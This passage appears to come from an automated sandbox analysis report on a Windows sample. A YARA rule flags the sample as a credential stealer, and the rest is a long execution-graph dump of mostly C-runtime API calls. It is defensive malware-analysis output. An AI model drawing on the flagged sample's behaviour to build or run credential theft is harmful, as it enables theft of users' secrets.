                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1751845531.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:6.5%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:5.8%
                                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                                          Total number of Limit Nodes:26
                                                                                                                                                                                                                                                          execution_graph 19856 6f92d7 19859 6fbed7 19856->19859 19860 6f92ef 19859->19860 19861 6fbee2 RtlFreeHeap 19859->19861 19861->19860 19862 6fbef7 GetLastError 19861->19862 19863 6fbf04 __dosmaperr 19862->19863 19865 6f76e4 19863->19865 19868 6fc2bb GetLastError 19865->19868 19867 6f76e9 19867->19860 19869 6fc2d1 19868->19869 19872 6fc2d7 19868->19872 19891 6fcb94 19869->19891 19888 6fc2db SetLastError 19872->19888 19896 6fcbd3 19872->19896 19877 6fc321 19880 6fcbd3 __Getctype 6 API calls 19877->19880 19878 6fc310 19879 6fcbd3 __Getctype 6 API calls 19878->19879 19882 6fc31e 19879->19882 19881 6fc32d 19880->19881 19883 6fc348 19881->19883 19884 6fc331 19881->19884 19886 6fbed7 ___free_lconv_mon 12 API calls 19882->19886 19910 6fc47c 19883->19910 19885 6fcbd3 __Getctype 6 API calls 19884->19885 19885->19882 19886->19888 19888->19867 19890 6fbed7 ___free_lconv_mon 12 API calls 19890->19888 19915 6fcfd6 19891->19915 19894 6fcbcb TlsGetValue 19895 6fcbb9 19895->19872 19897 6fcfd6 std::_Lockit::_Lockit 5 API calls 19896->19897 19898 6fcbef 19897->19898 19899 6fcc0d TlsSetValue 19898->19899 19900 6fc2f3 19898->19900 19900->19888 19901 6fd2b4 19900->19901 19902 6fd2c1 19901->19902 19903 6fd2ec HeapAlloc 19902->19903 19904 6fd301 19902->19904 19909 6fd2d5 __Getctype 19902->19909 19905 6fd2ff 19903->19905 19903->19909 19906 6f76e4 __strnicoll 13 API calls 19904->19906 19907 6fc308 19905->19907 19906->19907 19907->19877 19907->19878 19909->19903 19909->19904 19930 6f5877 19909->19930 19944 6fc5e2 19910->19944 19916 6fd006 19915->19916 19919 6fcbb0 19915->19919 19916->19919 19922 6fcf0b 19916->19922 19919->19894 19919->19895 19920 6fd020 GetProcAddress 19920->19919 19921 6fd030 std::_Lockit::_Lockit 19920->19921 19921->19919 19928 6fcf1c ___vcrt_FlsSetValue 19922->19928 19923 6fcfb2 19923->19919 19923->19920 19924 6fcf3a LoadLibraryExW 19925 6fcfb9 19924->19925 19926 6fcf55 GetLastError 19924->19926 19925->19923 19927 6fcfcb FreeLibrary 19925->19927 19926->19928 19927->19923 19928->19923 19928->19924 19929 6fcf88 LoadLibraryExW 19928->19929 19929->19925 19929->19928 19933 6f58b2 19930->19933 19934 6f58be ___scrt_is_nonwritable_in_current_image 19933->19934 19939 6f80e1 EnterCriticalSection 19934->19939 19936 6f58c9 CallUnexpected 19940 6f5900 19936->19940 19939->19936 19943 6f80f8 LeaveCriticalSection 19940->19943 19942 6f5882 19942->19909 19943->19942 19945 6fc5ee ___scrt_is_nonwritable_in_current_image 19944->19945 19958 6f80e1 EnterCriticalSection 19945->19958 19947 6fc5f8 19959 6fc628 19947->19959 19950 6fc634 19951 6fc640 ___scrt_is_nonwritable_in_current_image 19950->19951 19963 6f80e1 EnterCriticalSection 19951->19963 19953 6fc64a 19964 6fc431 19953->19964 19955 6fc662 19968 6fc682 19955->19968 19958->19947 19962 6f80f8 LeaveCriticalSection 19959->19962 19961 6fc4ea 19961->19950 19962->19961 19963->19953 19965 6fc467 __Getctype 19964->19965 19966 6fc440 __Getctype 19964->19966 19965->19955 19966->19965 19971 7006da 19966->19971 20085 6f80f8 LeaveCriticalSection 19968->20085 19970 6fc353 19970->19890 19973 70075a 19971->19973 19974 7006f0 19971->19974 19975 6fbed7 ___free_lconv_mon 14 API calls 19973->19975 19998 7007a8 19973->19998 19974->19973 19979 6fbed7 ___free_lconv_mon 14 API calls 19974->19979 19981 700723 19974->19981 19976 70077c 19975->19976 19977 6fbed7 ___free_lconv_mon 14 API calls 19976->19977 19982 70078f 19977->19982 19978 6fbed7 ___free_lconv_mon 14 API calls 19983 70074f 19978->19983 19985 700718 19979->19985 19980 7007b6 19984 700816 19980->19984 19991 6fbed7 14 API calls ___free_lconv_mon 19980->19991 19986 6fbed7 ___free_lconv_mon 14 API calls 19981->19986 19997 700745 19981->19997 19987 6fbed7 ___free_lconv_mon 14 API calls 19982->19987 19988 6fbed7 ___free_lconv_mon 14 API calls 19983->19988 19989 6fbed7 ___free_lconv_mon 14 API calls 19984->19989 19999 6ffb31 19985->19999 19992 70073a 19986->19992 19993 70079d 19987->19993 19988->19973 19994 70081c 19989->19994 19991->19980 20027 6ffe4d 19992->20027 19996 6fbed7 ___free_lconv_mon 14 API calls 19993->19996 19994->19965 19996->19998 19997->19978 20039 700874 19998->20039 20000 6ffb42 19999->20000 20026 6ffc2b 19999->20026 20001 6ffb53 20000->20001 20003 6fbed7 ___free_lconv_mon 14 API calls 20000->20003 20002 6ffb65 20001->20002 20004 6fbed7 ___free_lconv_mon 14 API calls 20001->20004 20005 6ffb77 20002->20005 20006 6fbed7 ___free_lconv_mon 14 API calls 20002->20006 20003->20001 20004->20002 20007 6ffb89 20005->20007 20008 6fbed7 ___free_lconv_mon 14 API calls 20005->20008 20006->20005 20009 6ffb9b 20007->20009 20011 6fbed7 ___free_lconv_mon 14 API calls 20007->20011 20008->20007 20010 6ffbad 20009->20010 20012 6fbed7 ___free_lconv_mon 14 API calls 20009->20012 20013 6ffbbf 20010->20013 20014 6fbed7 ___free_lconv_mon 14 API calls 20010->20014 20011->20009 20012->20010 20015 6ffbd1 20013->20015 20016 6fbed7 ___free_lconv_mon 14 API calls 20013->20016 20014->20013 20017 6ffbe3 20015->20017 20019 6fbed7 ___free_lconv_mon 14 API calls 20015->20019 20016->20015 20018 6ffbf5 20017->20018 20020 6fbed7 ___free_lconv_mon 14 API calls 20017->20020 20021 6ffc07 20018->20021 20022 6fbed7 ___free_lconv_mon 14 API calls 20018->20022 20019->20017 20020->20018 20023 6ffc19 20021->20023 20024 6fbed7 ___free_lconv_mon 14 API calls 20021->20024 20022->20021 20025 6fbed7 ___free_lconv_mon 14 API calls 20023->20025 20023->20026 20024->20023 20025->20026 20026->19981 20028 6ffe5a 20027->20028 20038 6ffeb2 20027->20038 20029 6ffe6a 20028->20029 20030 6fbed7 ___free_lconv_mon 14 API calls 20028->20030 20031 6fbed7 ___free_lconv_mon 14 API calls 20029->20031 20035 6ffe7c 20029->20035 20030->20029 20031->20035 20032 6fbed7 ___free_lconv_mon 14 API calls 20033 6ffe8e 20032->20033 20034 6ffea0 20033->20034 20036 6fbed7 ___free_lconv_mon 14 API calls 20033->20036 20037 6fbed7 ___free_lconv_mon 14 API calls 20034->20037 20034->20038 20035->20032 20035->20033 20036->20034 20037->20038 20038->19997 20040 7008a0 20039->20040 20041 700881 20039->20041 20040->19980 20041->20040 20045 6fff3b 20041->20045 20044 6fbed7 ___free_lconv_mon 14 API calls 20044->20040 20046 6fff4c 20045->20046 20047 700019 20045->20047 20081 70029b 20046->20081 20047->20044 20050 70029b __Getctype 14 API calls 20051 6fff5f 20050->20051 20052 70029b __Getctype 14 API calls 20051->20052 20053 6fff6a 20052->20053 20054 70029b __Getctype 14 API calls 20053->20054 20055 6fff75 20054->20055 20056 70029b __Getctype 14 API calls 20055->20056 20057 6fff83 20056->20057 20058 6fbed7 ___free_lconv_mon 14 API calls 20057->20058 20059 6fff8e 20058->20059 20060 6fbed7 ___free_lconv_mon 14 API calls 20059->20060 20061 6fff99 20060->20061 20062 6fbed7 ___free_lconv_mon 14 API calls 20061->20062 20063 6fffa4 20062->20063 20084 7002ad 20081->20084 20082 6fff54 20082->20050 20083 6fbed7 ___free_lconv_mon 14 API calls 20083->20084 20084->20082 20084->20083 20085->19970 20086 6f0312 20087 6f031e ___scrt_is_nonwritable_in_current_image 20086->20087 20112 6ea8ca 20087->20112 20089 6f0325 20090 6f047e 20089->20090 20099 6f034f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 20089->20099 20167 6ef8e9 IsProcessorFeaturePresent 20090->20167 20092 6f0485 20147 6f5545 20092->20147 20097 6f036e 20098 6f03ef 20123 6f7abc 20098->20123 20099->20097 20099->20098 20150 6f558f 20099->20150 20102 6f03f5 20127 6e24b0 GetConsoleWindow ShowWindow 20102->20127 20104 6f040c 20156 6ef896 GetModuleHandleW 20104->20156 20107 6f041a 20108 6f0423 20107->20108 20158 6f5571 20107->20158 20161 6ea903 20108->20161 20113 6ea8d3 20112->20113 20174 6ef555 IsProcessorFeaturePresent 20113->20174 20117 6ea8e4 20118 6ea8e8 20117->20118 20184 6f3230 20117->20184 20118->20089 20121 6ea8ff 20121->20089 20124 6f7ac5 20123->20124 20126 6f7aca 20123->20126 20256 6f7be5 20124->20256 20126->20102 20913 6ea663 20127->20913 20131 6e2513 20132 6e251d 20131->20132 20133 6e2554 20131->20133 20134 6e256c 20132->20134 20135 6e2524 GetCurrentThreadId 20132->20135 20945 6eb317 20133->20945 20139 6eb317 std::_Throw_Cpp_error 30 API calls 20134->20139 20137 6e252d 20135->20137 20138 6e257d 20135->20138 20939 6ef11d WaitForSingleObjectEx 20137->20939 20140 6eb317 std::_Throw_Cpp_error 30 API calls 20138->20140 20139->20138 20142 6e258e 20140->20142 20145 6eb317 std::_Throw_Cpp_error 30 API calls 20142->20145 20144 6e2541 20144->20104 20146 6e259f 20145->20146 20146->20104 21125 6f5690 20147->21125 20151 6f55a5 ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit 20150->20151 20151->20098 20152 6fc16a __Getctype 39 API calls 20151->20152 20155 6fa17c 20152->20155 20153 6f8353 CallUnexpected 39 API calls 20154 6fa1a6 20153->20154 20155->20153 20157 6ef8a2 20156->20157 20157->20092 20157->20107 20159 6f5690 CallUnexpected 21 API calls 20158->20159 20160 6f557c 20159->20160 20160->20108 20162 6ea90f 20161->20162 20166 6ea925 20162->20166 21198 6f3242 20162->21198 20164 6ea91d 20165 6f0ce7 ___scrt_uninitialize_crt 7 API calls 20164->20165 20165->20166 20166->20097 20168 6ef8ff __fread_nolock CallUnexpected 20167->20168 20169 6ef9aa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20168->20169 20170 6ef9ee CallUnexpected 20169->20170 20170->20092 20171 6f555b 20172 6f5690 CallUnexpected 21 API calls 20171->20172 20173 6f0493 20172->20173 20175 6ea8df 20174->20175 20176 6f0cc8 20175->20176 20193 6fbba6 20176->20193 20179 6f0cd1 20179->20117 20181 6f0cd9 20182 6f0ce4 20181->20182 20207 6fbbe2 20181->20207 20182->20117 20247 6fe2e9 20184->20247 20187 6f0ce7 20188 6f0cfa 20187->20188 20189 6f0cf0 20187->20189 20188->20118 20190 6facbe ___vcrt_uninitialize_ptd 6 API calls 20189->20190 20191 6f0cf5 20190->20191 20192 6fbbe2 ___vcrt_uninitialize_locks DeleteCriticalSection 20191->20192 20192->20188 20194 6fbbaf 20193->20194 20196 6fbbd8 20194->20196 20197 6f0ccd 20194->20197 20211 7068f9 20194->20211 20198 6fbbe2 ___vcrt_uninitialize_locks DeleteCriticalSection 20196->20198 20197->20179 20199 6fac8b 20197->20199 20198->20197 20228 70680a 20199->20228 20204 6facbb 20204->20181 20206 6faca0 20206->20181 20208 6fbc0c 20207->20208 20209 6fbbed 20207->20209 20208->20179 20210 6fbbf7 DeleteCriticalSection 20209->20210 20210->20208 20210->20210 20216 70698b 20211->20216 20214 706931 InitializeCriticalSectionAndSpinCount 20215 70691c 20214->20215 20215->20194 20217 706913 20216->20217 20218 7069ac 20216->20218 20217->20214 20217->20215 20218->20217 20219 706a14 GetProcAddress 20218->20219 20221 706a05 20218->20221 20223 706940 LoadLibraryExW 20218->20223 20219->20217 20221->20219 20222 706a0d FreeLibrary 20221->20222 20222->20219 20224 706957 GetLastError 20223->20224 20225 706987 20223->20225 20224->20225 20226 706962 ___vcrt_FlsSetValue 20224->20226 20225->20218 20226->20225 20227 706978 LoadLibraryExW 20226->20227 20227->20218 20229 70698b ___vcrt_FlsSetValue 5 API calls 20228->20229 20230 706824 20229->20230 20231 70683d TlsAlloc 20230->20231 20232 6fac95 20230->20232 20232->20206 20233 7068bb 20232->20233 20234 70698b ___vcrt_FlsSetValue 5 API calls 20233->20234 20235 7068d5 20234->20235 20236 7068f0 TlsSetValue 20235->20236 20237 6facae 20235->20237 20236->20237 20237->20204 20238 6facbe 20237->20238 20239 6facc8 20238->20239 20240 6facce 20238->20240 20242 706845 20239->20242 20240->20206 20243 70698b ___vcrt_FlsSetValue 5 API calls 20242->20243 20244 70685f 20243->20244 20245 706877 TlsFree 20244->20245 20246 70686b 20244->20246 20245->20246 20246->20240 20248 6fe2f9 20247->20248 20249 6ea8f1 20247->20249 20248->20249 20251 6fda52 20248->20251 20249->20121 20249->20187 20252 6fda59 20251->20252 20253 6fda9c GetStdHandle 20252->20253 20254 6fdafe 20252->20254 20255 6fdaaf GetFileType 20252->20255 20253->20252 20254->20248 20255->20252 20257 6f7bee 20256->20257 20261 6f7c04 20256->20261 20257->20261 20262 6f7b26 20257->20262 20259 6f7bfb 20259->20261 20279 6f7cf3 20259->20279 20261->20126 20263 6f7b2f 20262->20263 20264 6f7b32 20262->20264 20263->20259 20288 6fdb20 20264->20288 20269 6f7b4f 20315 6f7c11 20269->20315 20270 6f7b43 20271 6fbed7 ___free_lconv_mon 14 API calls 20270->20271 20273 6f7b49 20271->20273 20273->20259 20275 6fbed7 ___free_lconv_mon 14 API calls 20276 6f7b73 20275->20276 20277 6fbed7 ___free_lconv_mon 14 API calls 20276->20277 20278 6f7b79 20277->20278 20278->20259 20280 6f7d64 20279->20280 20284 6f7d02 20279->20284 20280->20261 20281 6fc021 WideCharToMultiByte _Fputc 20281->20284 20282 6fd2b4 __Getctype 14 API calls 20282->20284 20283 6f7d68 20285 6fbed7 ___free_lconv_mon 14 API calls 20283->20285 20284->20280 20284->20281 20284->20282 20284->20283 20287 6fbed7 ___free_lconv_mon 14 API calls 20284->20287 20698 703295 20284->20698 20285->20280 20287->20284 20289 6fdb29 20288->20289 20290 6f7b38 20288->20290 20337 6fc225 20289->20337 20294 7031be GetEnvironmentStringsW 20290->20294 20295 7031d6 20294->20295 20296 6f7b3d 20294->20296 20297 6fc021 _Fputc WideCharToMultiByte 20295->20297 20296->20269 20296->20270 20298 7031f3 20297->20298 20299 703208 20298->20299 20300 7031fd FreeEnvironmentStringsW 20298->20300 20301 6fbf11 __fread_nolock 15 API calls 20299->20301 20300->20296 20302 70320f 20301->20302 20303 703217 20302->20303 20304 703228 20302->20304 20305 6fbed7 ___free_lconv_mon 14 API calls 20303->20305 20306 6fc021 _Fputc WideCharToMultiByte 20304->20306 20308 70321c FreeEnvironmentStringsW 20305->20308 20307 703238 20306->20307 20309 703247 20307->20309 20310 70323f 20307->20310 20308->20296 20312 6fbed7 ___free_lconv_mon 14 API calls 20309->20312 20311 6fbed7 ___free_lconv_mon 14 API calls 20310->20311 20313 703245 FreeEnvironmentStringsW 20311->20313 20312->20313 20313->20296 20316 6f7c26 20315->20316 20317 6fd2b4 __Getctype 14 API calls 20316->20317 20318 6f7c4d 20317->20318 20319 6f7c55 20318->20319 20328 6f7c5f 20318->20328 20320 6fbed7 ___free_lconv_mon 14 API calls 20319->20320 20336 6f7b56 20320->20336 20321 6f7cbc 20322 6fbed7 ___free_lconv_mon 14 API calls 20321->20322 20322->20336 20323 6fd2b4 __Getctype 14 API calls 20323->20328 20324 6f7ccb 20688 6f7bb6 20324->20688 20328->20321 20328->20323 20328->20324 20330 6f7ce6 20328->20330 20332 6fbed7 ___free_lconv_mon 14 API calls 20328->20332 20679 6fbb4c 20328->20679 20329 6fbed7 ___free_lconv_mon 14 API calls 20331 6f7cd8 20329->20331 20694 6f7dfc IsProcessorFeaturePresent 20330->20694 20334 6fbed7 ___free_lconv_mon 14 API calls 20331->20334 20332->20328 20334->20336 20335 6f7cf2 20336->20275 20338 6fc236 20337->20338 20339 6fc230 20337->20339 20341 6fcbd3 __Getctype 6 API calls 20338->20341 20359 6fc23c 20338->20359 20340 6fcb94 __Getctype 6 API calls 20339->20340 20340->20338 20342 6fc250 20341->20342 20344 6fd2b4 __Getctype 14 API calls 20342->20344 20342->20359 20347 6fc260 20344->20347 20346 6fc241 20362 6fdee1 20346->20362 20348 6fc27d 20347->20348 20349 6fc268 20347->20349 20350 6fcbd3 __Getctype 6 API calls 20348->20350 20351 6fcbd3 __Getctype 6 API calls 20349->20351 20353 6fc289 20350->20353 20352 6fc274 20351->20352 20356 6fbed7 ___free_lconv_mon 14 API calls 20352->20356 20354 6fc28d 20353->20354 20355 6fc29c 20353->20355 20357 6fcbd3 __Getctype 6 API calls 20354->20357 20358 6fc47c __Getctype 14 API calls 20355->20358 20356->20359 20357->20352 20360 6fc2a7 20358->20360 20359->20346 20384 6f8353 20359->20384 20361 6fbed7 ___free_lconv_mon 14 API calls 20360->20361 20361->20346 20363 6fdf0b 20362->20363 20500 6fdd6d 20363->20500 20366 6fdf24 20366->20290 20369 6fdf3d 20371 6fbed7 ___free_lconv_mon 14 API calls 20369->20371 20370 6fdf4b 20514 6fdb68 20370->20514 20371->20366 20374 6fdf83 20375 6f76e4 __strnicoll 14 API calls 20374->20375 20376 6fdf88 20375->20376 20378 6fbed7 ___free_lconv_mon 14 API calls 20376->20378 20377 6fdf9e 20379 6fbed7 ___free_lconv_mon 14 API calls 20377->20379 20382 6fdfca 20377->20382 20378->20366 20379->20382 20381 6fbed7 ___free_lconv_mon 14 API calls 20381->20366 20383 6fe013 20382->20383 20525 6fe29c 20382->20525 20383->20381 20395 6fe3a0 20384->20395 20387 6f8363 20389 6f836d IsProcessorFeaturePresent 20387->20389 20394 6f838c 20387->20394 20391 6f8379 20389->20391 20390 6f555b CallUnexpected 21 API calls 20392 6f8396 20390->20392 20425 6f7e30 20391->20425 20394->20390 20431 6fe623 20395->20431 20398 6fe3c7 20399 6fe3d3 ___scrt_is_nonwritable_in_current_image 20398->20399 20400 6fc2bb __strnicoll 14 API calls 20399->20400 20401 6fe423 20399->20401 20402 6fe435 CallUnexpected 20399->20402 20407 6fe404 CallUnexpected 20399->20407 20400->20407 20403 6f76e4 __strnicoll 14 API calls 20401->20403 20404 6fe46b CallUnexpected 20402->20404 20445 6f80e1 EnterCriticalSection 20402->20445 20405 6fe428 20403->20405 20410 6fe4a8 20404->20410 20411 6fe5a5 20404->20411 20421 6fe4d6 20404->20421 20442 6f7dcf 20405->20442 20407->20401 20407->20402 20424 6fe40d 20407->20424 20410->20421 20446 6fc16a GetLastError 20410->20446 20412 6fe5b0 20411->20412 20477 6f80f8 LeaveCriticalSection 20411->20477 20415 6f555b CallUnexpected 21 API calls 20412->20415 20417 6fe5b8 20415->20417 20418 6fc16a __Getctype 39 API calls 20422 6fe52b 20418->20422 20420 6fc16a __Getctype 39 API calls 20420->20421 20473 6fe551 20421->20473 20423 6fc16a __Getctype 39 API calls 20422->20423 20422->20424 20423->20424 20424->20387 20426 6f7e4c __fread_nolock CallUnexpected 20425->20426 20427 6f7e78 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20426->20427 20428 6f7f49 CallUnexpected 20427->20428 20492 6ea6e1 20428->20492 20430 6f7f67 20430->20394 20432 6fe62f ___scrt_is_nonwritable_in_current_image 20431->20432 20437 6f80e1 EnterCriticalSection 20432->20437 20434 6fe63d 20438 6fe67f 20434->20438 20437->20434 20441 6f80f8 LeaveCriticalSection 20438->20441 20440 6f8358 20440->20387 20440->20398 20441->20440 20478 6f801e 20442->20478 20444 6f7ddb 20444->20424 20445->20404 20447 6fc186 20446->20447 20448 6fc180 20446->20448 20450 6fcbd3 __Getctype 6 API calls 20447->20450 20452 6fc18a SetLastError 20447->20452 20449 6fcb94 __Getctype 6 API calls 20448->20449 20449->20447 20451 6fc1a2 20450->20451 20451->20452 20454 6fd2b4 __Getctype 14 API calls 20451->20454 20455 6fc21f 20452->20455 20456 6fc21a 20452->20456 20457 6fc1b7 20454->20457 20458 6f8353 CallUnexpected 37 API calls 20455->20458 20456->20420 20459 6fc1bf 20457->20459 20460 6fc1d0 20457->20460 20462 6fc224 20458->20462 20463 6fcbd3 __Getctype 6 API calls 20459->20463 20461 6fcbd3 __Getctype 6 API calls 20460->20461 20464 6fc1dc 20461->20464 20465 6fc1cd 20463->20465 20466 6fc1f7 20464->20466 20467 6fc1e0 20464->20467 20469 6fbed7 ___free_lconv_mon 14 API calls 20465->20469 20470 6fc47c __Getctype 14 API calls 20466->20470 20468 6fcbd3 __Getctype 6 API calls 20467->20468 20468->20465 20469->20452 20471 6fc202 20470->20471 20472 6fbed7 ___free_lconv_mon 14 API calls 20471->20472 20472->20452 20474 6fe555 20473->20474 20475 6fe51d 20473->20475 20491 6f80f8 LeaveCriticalSection 20474->20491 20475->20418 20475->20422 20475->20424 20477->20412 20479 6f8030 _Fputc 20478->20479 20482 6f7f78 20479->20482 20481 6f8048 _Fputc 20481->20444 20483 6f7f88 20482->20483 20484 6f7f8f 20482->20484 20485 6f37f0 _Fputc 16 API calls 20483->20485 20486 6f7ff5 _Fputc GetLastError SetLastError 20484->20486 20488 6f7f9d 20484->20488 20485->20484 20487 6f7fc4 20486->20487 20487->20488 20489 6f7dfc __Getctype 11 API calls 20487->20489 20488->20481 20490 6f7ff4 20489->20490 20491->20475 20493 6ea6ea IsProcessorFeaturePresent 20492->20493 20494 6ea6e9 20492->20494 20496 6ef447 20493->20496 20494->20430 20499 6ef52d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20496->20499 20498 6ef52a 20498->20430 20499->20498 20533 6f297a 20500->20533 20503 6fdd8e GetOEMCP 20505 6fddb7 20503->20505 20504 6fdda0 20504->20505 20506 6fdda5 GetACP 20504->20506 20505->20366 20507 6fbf11 20505->20507 20506->20505 20508 6fbf4f 20507->20508 20509 6fbf1f __Getctype 20507->20509 20511 6f76e4 __strnicoll 14 API calls 20508->20511 20509->20508 20510 6fbf3a RtlAllocateHeap 20509->20510 20513 6f5877 std::ios_base::_Init 2 API calls 20509->20513 20510->20509 20512 6fbf4d 20510->20512 20511->20512 20512->20369 20512->20370 20513->20509 20515 6fdd6d 41 API calls 20514->20515 20516 6fdb88 20515->20516 20517 6fdc8d 20516->20517 20519 6fdbc5 IsValidCodePage 20516->20519 20524 6fdbe0 __fread_nolock 20516->20524 20518 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 20517->20518 20520 6fdd6b 20518->20520 20519->20517 20521 6fdbd7 20519->20521 20520->20374 20520->20377 20522 6fdc00 GetCPInfo 20521->20522 20521->20524 20522->20517 20522->20524 20573 6fe0f7 20524->20573 20526 6fe2a8 ___scrt_is_nonwritable_in_current_image 20525->20526 20653 6f80e1 EnterCriticalSection 20526->20653 20528 6fe2b2 20654 6fe036 20528->20654 20534 6f2998 20533->20534 20535 6f2991 20533->20535 20534->20535 20536 6fc16a __Getctype 39 API calls 20534->20536 20535->20503 20535->20504 20537 6f29b9 20536->20537 20541 6fc74e 20537->20541 20542 6fc761 20541->20542 20544 6f29cf 20541->20544 20542->20544 20549 7008a5 20542->20549 20545 6fc77b 20544->20545 20546 6fc78e 20545->20546 20547 6fc7a3 20545->20547 20546->20547 20570 6fdb02 20546->20570 20547->20535 20550 7008b1 ___scrt_is_nonwritable_in_current_image 20549->20550 20551 6fc16a __Getctype 39 API calls 20550->20551 20552 7008ba 20551->20552 20559 700900 20552->20559 20562 6f80e1 EnterCriticalSection 20552->20562 20554 7008d8 20563 700926 20554->20563 20559->20544 20560 6f8353 CallUnexpected 39 API calls 20561 700925 20560->20561 20562->20554 20564 700934 __Getctype 20563->20564 20566 7008e9 20563->20566 20565 7006da __Getctype 14 API calls 20564->20565 20564->20566 20565->20566 20567 700905 20566->20567 20568 6f80f8 std::_Lockit::~_Lockit LeaveCriticalSection 20567->20568 20569 7008fc 20568->20569 20569->20559 20569->20560 20571 6fc16a __Getctype 39 API calls 20570->20571 20572 6fdb07 20571->20572 20572->20547 20574 6fe11f GetCPInfo 20573->20574 20583 6fe1e8 20573->20583 20579 6fe137 20574->20579 20574->20583 20576 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 20577 6fe29a 20576->20577 20577->20517 20584 6fd5a0 20579->20584 20583->20576 20585 6f297a __strnicoll 39 API calls 20584->20585 20586 6fd5c0 20585->20586 20604 6fbf5f 20586->20604 20588 6fd67c 20591 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 20588->20591 20589 6fd674 20607 6efe0b 20589->20607 20590 6fd5ed 20590->20588 20590->20589 20594 6fbf11 __fread_nolock 15 API calls 20590->20594 20595 6fd612 __fread_nolock __alloca_probe_16 20590->20595 20592 6fd69f 20591->20592 20599 6fd6a1 20592->20599 20594->20595 20595->20589 20596 6fbf5f __fread_nolock MultiByteToWideChar 20595->20596 20597 6fd65b 20596->20597 20597->20589 20598 6fd662 GetStringTypeW 20597->20598 20598->20589 20600 6f297a __strnicoll 39 API calls 20599->20600 20611 6fbf89 20604->20611 20608 6efe26 20607->20608 20609 6efe15 20607->20609 20608->20588 20609->20608 20613 6f92d7 20609->20613 20612 6fbf7b MultiByteToWideChar 20611->20612 20612->20590 20614 6fbed7 ___free_lconv_mon 14 API calls 20613->20614 20653->20528 20664 6f8fc3 20654->20664 20656 6fe058 20657 6f8fc3 __fread_nolock 29 API calls 20656->20657 20658 6fe077 20657->20658 20659 6fbed7 ___free_lconv_mon 14 API calls 20658->20659 20660 6fe09e 20658->20660 20659->20660 20665 6f8fd4 20664->20665 20666 6f8fd0 codecvt 20664->20666 20667 6f8fdb 20665->20667 20671 6f8fee __fread_nolock 20665->20671 20666->20656 20668 6f76e4 __strnicoll 14 API calls 20667->20668 20669 6f8fe0 20668->20669 20670 6f7dcf __strnicoll 29 API calls 20669->20670 20670->20666 20671->20666 20672 6f901c 20671->20672 20673 6f9025 20671->20673 20674 6f76e4 __strnicoll 14 API calls 20672->20674 20673->20666 20675 6f76e4 __strnicoll 14 API calls 20673->20675 20676 6f9021 20674->20676 20675->20676 20680 6fbb68 20679->20680 20681 6fbb5a 20679->20681 20682 6f76e4 __strnicoll 14 API calls 20680->20682 20681->20680 20683 6fbb80 20681->20683 20687 6fbb70 20682->20687 20685 6fbb7a 20683->20685 20686 6f76e4 __strnicoll 14 API calls 20683->20686 20684 6f7dcf __strnicoll 29 API calls 20684->20685 20685->20328 20686->20687 20687->20684 20692 6f7bc3 20688->20692 20693 6f7be0 20688->20693 20689 6f7bda 20690 6fbed7 ___free_lconv_mon 14 API calls 20689->20690 20690->20693 20691 6fbed7 ___free_lconv_mon 14 API calls 20691->20692 20692->20689 20692->20691 20693->20329 20695 6f7e08 20694->20695 20696 6f7e30 CallUnexpected 8 API calls 20695->20696 20697 6f7e1d GetCurrentProcess TerminateProcess 20696->20697 20697->20335 20699 7032a0 20698->20699 20700 7032b1 20699->20700 20703 7032c4 ___from_strstr_to_strchr 20699->20703 20701 6f76e4 __strnicoll 14 API calls 20700->20701 20711 7032b6 20701->20711 20702 7034db 20705 6f76e4 __strnicoll 14 API calls 20702->20705 20703->20702 20704 7032e4 20703->20704 20761 703500 20704->20761 20707 7034e0 20705->20707 20709 6fbed7 ___free_lconv_mon 14 API calls 20707->20709 20709->20711 20710 703328 20713 703314 20710->20713 20765 70351a 20710->20765 20711->20284 20712 70332a 20712->20713 20717 6fd2b4 __Getctype 14 API calls 20712->20717 20719 6fbed7 ___free_lconv_mon 14 API calls 20713->20719 20714 703306 20722 703323 20714->20722 20723 70330f 20714->20723 20718 703338 20717->20718 20721 6fbed7 ___free_lconv_mon 14 API calls 20718->20721 20719->20711 20720 70339d 20724 6fbed7 ___free_lconv_mon 14 API calls 20720->20724 20725 703343 20721->20725 20727 703500 39 API calls 20722->20727 20726 6f76e4 __strnicoll 14 API calls 20723->20726 20733 7033a5 20724->20733 20725->20710 20725->20713 20731 6fd2b4 __Getctype 14 API calls 20725->20731 20726->20713 20727->20710 20728 7033e8 20728->20713 20729 7028b5 std::ios_base::_Init 32 API calls 20728->20729 20730 703416 20729->20730 20732 6fbed7 ___free_lconv_mon 14 API calls 20730->20732 20734 70335f 20731->20734 20738 7033d2 20732->20738 20733->20738 20769 7028b5 20733->20769 20737 6fbed7 ___free_lconv_mon 14 API calls 20734->20737 20735 6fbed7 ___free_lconv_mon 14 API calls 20735->20711 20737->20710 20738->20713 20738->20738 20741 6fd2b4 __Getctype 14 API calls 20738->20741 20758 7034d0 20738->20758 20739 7033c9 20740 6fbed7 ___free_lconv_mon 14 API calls 20739->20740 20740->20738 20742 703461 20741->20742 20743 703471 20742->20743 20744 703469 20742->20744 20746 6fbb4c ___std_exception_copy 29 API calls 20743->20746 20745 6fbed7 ___free_lconv_mon 14 API calls 20744->20745 20745->20713 20747 70347d 20746->20747 20748 703484 20747->20748 20749 7034f5 20747->20749 20778 70a23c 20748->20778 20751 6f7dfc __Getctype 11 API calls 20749->20751 20752 7034ff 20751->20752 20754 7034ca 20756 6fbed7 ___free_lconv_mon 14 API calls 20754->20756 20755 